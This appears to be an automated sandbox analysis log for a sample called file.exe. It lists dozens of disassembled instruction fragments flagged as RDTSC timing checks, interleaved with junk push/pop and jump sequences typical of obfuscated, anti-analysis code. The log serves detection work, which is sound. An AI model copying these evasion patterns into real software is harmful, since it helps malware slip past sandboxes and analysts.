Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000C17 second address: 1000C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000D4C second address: 1000D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000D50 second address: 1000D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FFB34C126B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001014 second address: 100101A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100101A second address: 100102D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100102D second address: 1001031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001031 second address: 1001039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001039 second address: 100103F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3919 second address: FD391D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD391D second address: FD3923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3923 second address: FD3929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3929 second address: FD3943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FFB34E3B6CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3CA7 second address: FD3CB5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FFB34C126B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3CB5 second address: FD3CD0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFB34E3B6C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov edx, 39086CF5h 0x00000011 push 00000004h 0x00000013 mov dh, ch 0x00000015 nop 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3CD0 second address: FD3CF6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFB34C126B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FFB34C126C0h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 jo 00007FFB34C126B6h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3CF6 second address: FD3D08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFB34E3B6CDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD44AC second address: FD4523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FFB34C126B8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov edx, esi 0x00000028 lea eax, dword ptr [ebp+12497EDCh] 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007FFB34C126B8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 jl 00007FFB34C126B9h 0x0000004e movsx ecx, si 0x00000051 push eax 0x00000052 push ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD4523 second address: FD4527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1005589 second address: 100559D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFB34C126B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e ja 00007FFB34C126B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100559D second address: 10055A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10055A1 second address: 10055A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10055A7 second address: 10055B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10055B3 second address: 10055B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1005762 second address: 1005771 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FFB34E3B6C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1005771 second address: 1005791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 jmp 00007FFB34C126C1h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1005791 second address: 1005797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1005797 second address: 100579B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1005AF0 second address: 1005AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1005C89 second address: 1005C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100609B second address: 10060CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34E3B6CDh 0x00000009 popad 0x0000000a push eax 0x0000000b jl 00007FFB34E3B6C6h 0x00000011 jmp 00007FFB34E3B6D5h 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10060CA second address: 10060F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C1h 0x00000007 pushad 0x00000008 jmp 00007FFB34C126BBh 0x0000000d jg 00007FFB34C126B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10139C3 second address: 10139C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1012778 second address: 101278A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34C126BAh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101278A second address: 10127A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34E3B6D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10128F8 second address: 10128FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10128FC second address: 1012900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1012900 second address: 1012921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FFB34C126B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007FFB34C126C2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1012921 second address: 1012926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1012A92 second address: 1012A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1012EA4 second address: 1012ECF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6D5h 0x00000007 push edi 0x00000008 jmp 00007FFB34E3B6D1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1013166 second address: 101316C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101316C second address: 1013172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1013172 second address: 1013178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10132B7 second address: 10132DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007FFB34E3B6D9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10132DA second address: 10132E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101375C second address: 1013772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34E3B6CAh 0x00000009 jl 00007FFB34E3B6CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1016A73 second address: 1016AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jne 00007FFB34C126B6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 jns 00007FFB34C126B6h 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c jnl 00007FFB34C126B6h 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 pushad 0x00000028 popad 0x00000029 pushad 0x0000002a popad 0x0000002b pop eax 0x0000002c jmp 00007FFB34C126BCh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10162E7 second address: 10162EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10162EB second address: 10162EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10162EF second address: 10162F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10162F8 second address: 1016308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFB34C126B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1016308 second address: 1016322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34E3B6D3h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101644F second address: 1016455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1016455 second address: 1016462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FFB34E3B6C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1016462 second address: 1016495 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a jg 00007FFB34C126C7h 0x00000010 jmp 00007FFB34C126C1h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FFB34C126BAh 0x0000001c je 00007FFB34C126B6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10165F0 second address: 1016608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFB34E3B6D0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1016608 second address: 101660C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1016784 second address: 101678C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101DE13 second address: 101DE2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101DE2A second address: 101DE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101DE2E second address: 101DE3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101CFB9 second address: 101CFD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34E3B6D8h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101D156 second address: 101D15C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101D15C second address: 101D167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FFB34E3B6C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101D305 second address: 101D30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101D5F5 second address: 101D5FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101D5FB second address: 101D612 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFB34C126B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FFB34C126BAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101D612 second address: 101D618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101D618 second address: 101D62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFB34C126BCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101D62F second address: 101D637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101D799 second address: 101D79F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101D79F second address: 101D7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FFB34E3B6F2h 0x0000000c jmp 00007FFB34E3B6D8h 0x00000011 jmp 00007FFB34E3B6D4h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FFB34E3B6D3h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10215AB second address: 10215BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FFB34C126B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1027829 second address: 102782D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102782D second address: 1027833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1027833 second address: 102784C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFB34E3B6CBh 0x0000000d jbe 00007FFB34E3B6C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102784C second address: 1027850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026279 second address: 102629B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34E3B6D4h 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102629B second address: 102629F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102629F second address: 10262B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FFB34E3B6C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10262B0 second address: 10262C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34C126C0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102666B second address: 1026671 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026671 second address: 102667B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102667B second address: 1026681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026681 second address: 1026699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FFB34C126BAh 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026699 second address: 10266B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34E3B6D8h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10266B6 second address: 10266BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3E6C second address: FD3EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FFB34E3B6C6h 0x0000000a popad 0x0000000b pushad 0x0000000c jno 00007FFB34E3B6C6h 0x00000012 js 00007FFB34E3B6C6h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b jg 00007FFB34E3B6D4h 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007FFB34E3B6C8h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c add dl, FFFFFFC1h 0x0000003f push edi 0x00000040 xor cl, 00000032h 0x00000043 pop edx 0x00000044 mov ebx, dword ptr [ebp+12497ED7h] 0x0000004a mov ch, al 0x0000004c add eax, ebx 0x0000004e jne 00007FFB34E3B6CEh 0x00000054 nop 0x00000055 push eax 0x00000056 push edx 0x00000057 jc 00007FFB34E3B6C8h 0x0000005d push esi 0x0000005e pop esi 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3EE4 second address: FD3EFD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFB34C126BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3EFD second address: FD3F7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FFB34E3B6C6h 0x0000000d jmp 00007FFB34E3B6CCh 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FFB34E3B6C8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f jns 00007FFB34E3B6CBh 0x00000035 call 00007FFB34E3B6CCh 0x0000003a mov dword ptr [ebp+122D2365h], edx 0x00000040 pop edx 0x00000041 push 00000004h 0x00000043 mov ecx, dword ptr [ebp+122D1E1Ah] 0x00000049 nop 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FFB34E3B6D9h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3F7B second address: FD3F89 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFB34C126B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
